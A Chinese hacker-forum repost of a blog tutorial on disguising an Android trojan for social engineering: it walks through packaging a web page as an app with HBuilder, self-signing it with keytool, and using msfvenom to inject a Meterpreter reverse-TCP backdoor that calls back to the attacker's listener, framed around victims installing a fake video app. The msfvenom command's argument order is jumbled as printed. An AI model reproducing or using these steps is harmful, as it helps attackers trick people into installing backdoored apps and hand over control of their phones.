跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

浅谈Shell的伪装的艺术

精选回复

发布于
在网络安全中,社会工程学已经是一种最为致命的攻击手段。常常让人出其不意,今天来看看如何利用 木马伪装的艺术来进行社会工程学攻击。

伪装的艺术

对安卓shell的伪装

利用 HBuilder将web页面打包成 APP
文件-新建-移动APP
配置APP项目
3956978859.jpg
需要注意是 页面入口便是APP启动后要进入的页面。

设置图标

1540892431.jpg
需要注意的是图标格式为 PNG

设置启动页

3662465916.jpg

打包APP

右键项目-发行-发行原生APP
1703045648.jpg
关于签名
如果你不懂关于androdi的前面,建议使用公用证书。但是需要实名认证。于是我这里用了自己的证书!

自建证书

Kali下我们利用下面命令建立证书。

keytool -genkey -alias testalias -keyalg RSA -keysize 2048 -validity 36500 -keystore kali.keystore

这样我们便创建了一个名为 kali.keystore的证书,输入证书的密码,位置等信息打包即可!

2480701655.jpg

下载app

发行-查看APP打包状态 下载已经打包好的app
1529860502.jpg

添加后门

msfvenom -p -x kali.apk android/meterpreter/reverse_tcp LHOST=192.168.232.195 LPORT=5555 R > kali1.apk

参数说明:
-x 原生APP
kali1.apk 最后生成含有后门的app

安装app

1675337827.jpg

运行app

b.jpg

就这样,当你还在不断的欣赏小视频的同时,别人就会得到你手机的权限。
运行app后 获得shell

需要注意的是,由于kali的版本不同或者java版本问题的差异,在实际中你可能会遇到各种坑。但是不要放弃总会成功的!

版权属于:逍遥子大表哥

本文链接:https://blog.bbskali.cn/2288.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。